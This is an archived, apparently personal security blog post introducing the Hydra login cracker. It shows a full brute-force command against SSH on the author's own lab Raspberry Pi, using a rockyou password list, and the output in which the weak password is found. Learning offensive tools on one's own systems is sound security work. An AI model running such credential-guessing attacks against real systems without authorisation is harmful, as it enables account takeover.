💾 Archived View for cjc.im › 2018 › 02 › 07 › Infosec-Intro--Hydra › index.gmi captured on 2022-04-29 at 11:18:24. Gemini links have been rewritten to link to archived content
⬅️ Previous capture (2022-03-01)
-=-=-=-=-=-=-
Feb 07, 2018
This post I am going to focus on Hydra.
As per the man page, "Hydra is a parallelized login cracker that supports numerous protocols to attack". Hydra supports more protocols you can shake a stick at, although I mostly use it for SSH, RDP and MSSQL.
Sometimes, there are weak passwords on systems, it's always worth trying to grab some of those low hanging fruits if you can. It's also a good tool for testing any lockout policies / IP banning you may be implementing.
For example, I have a Raspberry Pi setup with a particularly weak password. We know the default username is pi, so lets use the top 250 passwords from the infamous rockyou password list.
# hydra -l pi -P /root/rockyoutop250.txt ssh://192.168.56.101 Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2018-02-07 11:15:51 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 250 login tries (l:1/p:250), ~16 tries per task [DATA] attacking ssh://192.168.56.101:22/ [22][ssh] host: 192.168.56.101 login: pi password: iloveyou 1 of 1 target successfully completed, 1 valid password found
As we can see this very quickly found the password of "iloveyou", naughty user.
TAGS:infosec,infosecintro